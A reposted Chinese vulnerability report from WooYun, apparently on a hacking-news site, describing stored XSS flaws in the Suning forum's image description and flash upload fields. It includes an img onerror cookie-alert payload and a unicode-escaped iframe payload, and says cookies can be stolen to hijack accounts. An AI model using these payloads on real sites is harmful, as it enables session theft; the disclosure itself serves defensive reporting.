记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

苏宁易购多处XSS漏洞影响站内所有用户

2014-06-27 19:35

1、苏宁易购社区论坛中,进行发帖或回帖操作时,上传图片处,存在xss漏洞

1.jpg



2、读帖子时漏洞触发

2.jpg



3、在图片描述中使用payload:<img src=a onerror=alert(document.cookie)>,利用XSS平台可成功获取他人的cookie,进而劫持他人身份进行任意操作。

3.jpg



4、苏宁易购社区论坛中,进行发帖或回帖操作时,上传flash处,存在xss漏洞,注入如下flash: [flash]http://baidu.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf[/flash]

4.jpg



5、读帖子时漏洞触发

5.jpg

漏洞证明:

1、苏宁易购社区论坛中,进行发帖或回帖操作时,上传图片处,存在xss漏洞

1.jpg



2、读帖子时漏洞触发

2.jpg



3、在图片描述中使用payload:<img src=a onerror=alert(document.cookie)>,利用XSS平台可成功获取他人的cookie,进而劫持他人身份进行任意操作。

3.jpg



4、苏宁易购社区论坛中,进行发帖或回帖操作时,上传flash处,存在xss漏洞,注入如下flash: [flash]http://baidu.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf[/flash]

4.jpg



5、读帖子时漏洞触发

5.jpg

修复方案:

过滤输入数据~~



苏宁:求礼物哟!

知识来源: www.wooyun.org/bugs/wooyun-2014-060507

阅读:48848 | 评论:0 | 标签:xss 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“苏宁易购多处XSS漏洞影响站内所有用户”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词